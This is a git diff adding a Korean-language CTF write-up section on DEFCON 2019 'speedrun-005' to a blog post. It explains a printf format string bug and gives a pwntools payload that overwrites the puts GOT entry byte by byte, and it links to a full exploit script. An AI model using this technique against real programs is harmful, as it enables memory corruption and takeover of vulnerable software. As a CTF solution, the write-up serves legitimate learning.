modify DEFCON2019 speedrun content add speedrun005

--- a/post/2019-05-14-speedrun.md
+++ b/post/2019-05-14-speedrun.md
@@ -57,6 +57,55 @@ PIE:      No PIE (0x400000)
 [attack_speedrun004.py](https://github.com/wotmd/CTF_Exploit/blob/master/DEFCON_CTF_2019/speedrun004/attack_speedrun004.py)
 
 
+## speedrun-005
+```
+Arch:     amd64-64-little
+RELRO:    Partial RELRO
+Stack:    Canary found
+NX:       NX enabled
+PIE:      No PIE (0x400000)
+```
+`#포맷스트링버그` `#FSB`
+
+너무 멍청하게 풀어서 대회 당시에 4시간이나 삽질을 한 문제이다. `printf(&buf)`에서 `FSB`가 터지는데, printf로 출력할 때 `\x00`을 만나면 거기까지만 출력해준다. 그런데 여기서 멍청하게 생각을 못한게 어짜피 read로 읽어서 스택에는 데이터가 들어간다는것을 잊고있었다.(아오)
+그래서 그냥 스택에 `got`를 적당한것 puts GOT를 넣고 다시 `FSB`를 읽으켜서 `GOT`를 원샷으로 덮어주면 간단하다. 이걸 못맞추다니;;;
+근데 끝나고 풀어보려고하니까 데프콘서버쪽에 바이너리가 바뀌어서 익스가 안됨 ㅡㅡ; 서버쪽에는 puts GOT가 0x601020이던데, 뭔일인지...
+
+참고로 `FSB` payload는 pwntool의 fmtstr_payload를 쓰면 빠르게 할 수 있다. 물론 이 함수가 조금 멍청해서 target_address를 payload앞에 집어넣어서 64bit환경일 경우 printf에서 `\x00`으로 진작에 끊겨버리므로 아래와 같은 트릭을 써서 따로 계산해주는게 낫다.
+
+```python
+# make fsb payload
+context.clear(arch = 'amd64')
+fsb_payload = fmtstr_payload(30, writes={print_got:0x40069D}, numbwritten=(-64+24), write_size='byte')
+
+# this function create stupid string. start payload null(\x00)
+# null(\x00) is string end, printf is end. so addresses need to go to the payload end
+# so,  numbwritten=(-64+24) is alreay payload(24) + got_address(-8*8=-64)
+fsb_payload = fsb_payload[64:]			
+
+# leak _IO_stdfile_1_lock
+# stage 1. puts GOT overwrite FSB vuln function
+payload = "%122$16lx" 		# start offset 6
+payload += "A"*8
+payload += fsb_payload
+payload += ((8*24)-len(payload))*"A"	# padding 30-6 offset (target_offset - strat_offset)
+payload += p64(print_got)
+payload += p64(print_got + 1)
+payload += p64(print_got + 2)
+payload += p64(print_got + 3)
+payload += p64(print_got + 4)
+payload += p64(print_got + 5)
+payload += p64(print_got + 6)
+payload += p64(print_got + 6)
+payload += p64(print_got + 7)
+```
+
+대략 설명하면 `30`오프셋부터 `print_got`가 나온다고보고 numbwritten은 기존 페이로드에 먼저쓰인 `16+8`바이트에 쓸모없는 `64`를 뺀 값을 넣고, `byte`단위의 `FSB` payload이므로 8개의 address를 맨뒤에 넣어준다. 중간에 중요한 fsb다음에는 `30`오프셋까지 패딩해주면된다.
+
+
+[attack_speedrun005.py](https://github.com/wotmd/CTF_Exploit/blob/master/DEFCON_CTF_2019/speedrun005/attack_speedrun005.py)
+
+
 ## speedrun-009
 ```
 Arch:     amd64-64-little
